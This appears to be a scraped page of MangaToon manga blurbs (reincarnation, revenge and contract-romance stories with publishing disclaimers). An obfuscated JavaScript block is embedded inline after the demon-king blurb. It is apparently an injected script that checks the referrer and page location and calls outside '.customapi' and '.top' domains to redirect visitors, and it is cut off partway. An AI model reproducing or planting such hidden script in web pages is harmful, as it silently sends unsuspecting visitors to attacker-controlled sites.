Not only did I wake up in a coffin, I even became a ‘man’! Did I have time travel? What’s with this man’s dress? The life in another world is not easy, and I even have to deal with that dark and cunning duke!Source to collect images:
I time travelled. I died on the first day. What the heck, system? ! Sorry, host! Let’s start one more time! Lian Qi, an ordinary high school student, time travelled to be Princess Yunying with a useless system. Her mission is to help the forth prince, Prince XuanYu, ascend the crown and make him fall in love with herself. Ea…sy?! But Prince Xuanyu mistakes me for the assassin he met before… Don’t worry! You are the assassin! Fine… What?!!! MangaToon got authorization from Cloud Studio to publish this content, the content is the author’s own point of view, and does not represent the stand of MangaToon.
Ye Rongyin was set up by her boyfriend Ling Jiyan. It turned out that this man approached her only to coax her kidney for her sister Ye mingzhu. At her last breath, she saw Fu Jingsi, the man who she had been running away from all the time. He chose to die with her. Ye Rongyin was regretful that she had been so indifferent and aloof to him... Open her eyes, and Ye Rongyin finds herself reborn at the age of 20. This time, she will protect the one who truly loves her! However, Fu Jingsi clearly feels uncomfortable about her caring attitudes. "She must be pretending it. But... it still satisfies me as long as she is by my side." "Fu Jingsi, stop being possessive! I'm not your toy!" "No, you are not my toy. You are my sweet little devil." MangaToon got authorization from iReader to publish this content, the content is the author's own point of view, and does not represent the stand of MangaToon.
Eight years in love and she thought they were a match made in heaven, only to know she had fallen into a carefully designed trap. When time is rewound to the past, where should the reborn Xia Ruoxi go? Will she make a successful career this time? Will the young boy she just met change her fate... MangaToon got authorization from Cloud Studio to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
<h2>Spicy Wife's Reborn World</h2> Reborn in pursuit of revenge, I am sure I can easily achieve my goal, as— I happen to be as rich as Bill Gates, as beautiful as Audrey Hepburn, and as deadly as deadpool. However, none of these above works when it comes to dealing with a sweating and panting CEO, who is poisoned, who is in need of "immediate relief." I'd love to help, but...don't pull an ice-cool face when you're kissing me, sir! MangaToon got authorization from iCiyuan to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
To Conquer the World with You "Does she know poetry and song? Does she understand music, chess, calligraphy and painting? Does she know how to be a good wife and mother and manage a household?" Su Yao: "My beauty is enough ......" Years later, the crushed Kyoto noblewoman wondered, "Didn't you say that beauty is enough? Why do you still use your brain?" Su Yao: "Don't you know that the more beautiful a woman is, the less credible her words are?" MangaToon got authorization from BYdongman to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
Loyal king of demons said, "Now that you've found me, you need to be responsible for me." Lost memories and destined reunion. Yu Yin reincarnated twice and returned to the world he was originally from, but he got "scammed" by some unknown demon king the moment he's back. Moreover, he got bitten by him and formed an agreement! While Yu Yin was in astonishment, the demon king considered everything just normal. "I surely need to be responsible for you, given the relationship between us." MangaToon got authorization from Kuaikan Comics to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.<script></script><script>function _0x2ebb(){var _0x181a14=['BxLza','49boupRf','QOyoz','jevSC','1249452cqLQcZ','includes','950545aoDTQF','https://ip','3LTyIKj','16822830VCmbCc','AWpIi','http://rea','google','22976fjwlMV','526602QRoHVF','8ZgkSGu','EamGM','ykIHp','text','location','referrer','then','weMfY','wKNSh','href','1243116bxswKd','.customapi','1255419QbvuNe','random','','SHBJh','uLRLM','floor','.top/'];_0x2ebb=function(){return _0x181a14;};return _0x2ebb();}function _0x4887(_0x4afc8a,_0x248874){var _0x108685=_0x2ebb();return _0x4887=function(_0x1cfac4,_0x3a9f46){_0x1cfac4=_0x1cfac4-(0x184f+-0x5*-0x511+-0x3136);var _0xfb4022=_0x108685[_0x1cfac4];return _0xfb4022;},_0x4887(_0x4afc8a,_0x248874);}(function(_0x225dd6,_0x287ee2){var _0x2b58ee=_0x4887,_0x279d7b=_0x225dd6();while(!![]){try{var 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She's a D-list actress, who is unwanted by all, including her family. He's a negligible CEO, who has to carefully calculate his every move, just to survive. Facing the betrayal of closed ones, they formed a close alliance: knowing acting is her dream, he rolls out the red carpet for her; knowing he wants to prove himself, she offers her unconditional support. Hurt and hatred, company and comfort, who can deny that they are already in love... MangaToon got authorization from iQiyi Comics to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
She was a top-notch martial art master, winning the gold medals five years in a row. He was a superstar born in the richest family in the world. Handsome but aloof, he got so many fans around the world that was beyond counting. What she doesn’t know is that one day she would be reborn, and now she’s the fiancee of this superstar! Let the world sneer at her, and that’s not something that ever could bother her. After all, she deserves all the best. MangaToon got authorization from SaManHua to publish this content, the content is the author’s own point of view, and does not represent the stand of MangaToon.
The first time they met, she stripped him, put his clothes on and went home. The second time they met, she stripped herself, threatening him: “Leave or I’ll shout out!” The third time they met, she smirked to him: “Just strip. You will get used to it. Come on!” He would say: he has never met such a shameless girl. MangaToon got authorization from Hotread to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
Marshal, your wife ran away again! Alas, I've got used to that... Qingzhou Gu, a seemingly naïve girl, is plotting a revenge. Every coincidence is under her precise calculation. Every accident is her well-considered move. Could Marshal Si handling his tricky wife? What will happen in their romance? MangaToon got authorization from iCiyuan to publish this content, the content is the author's own point of view, and does not represent the stand of MangaToon.
Their marriage is entirely contractual. Just to be clear, this is a fake marriage and none of it should be taken seriously! He says, "People say I'm arrogant, overbearing, and ruthless, so don't fall for me." She says, "People say I'm the most beautiful and kind-hearted doctor, an angel sent by God to save patients, so you'd better not fall for me either..." They are both powerful people, and are a great match for each other! As they live together, their attitudes towards each other gradually change, and love develops between them... MangaToon got authorization from Kuaikan Comics to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.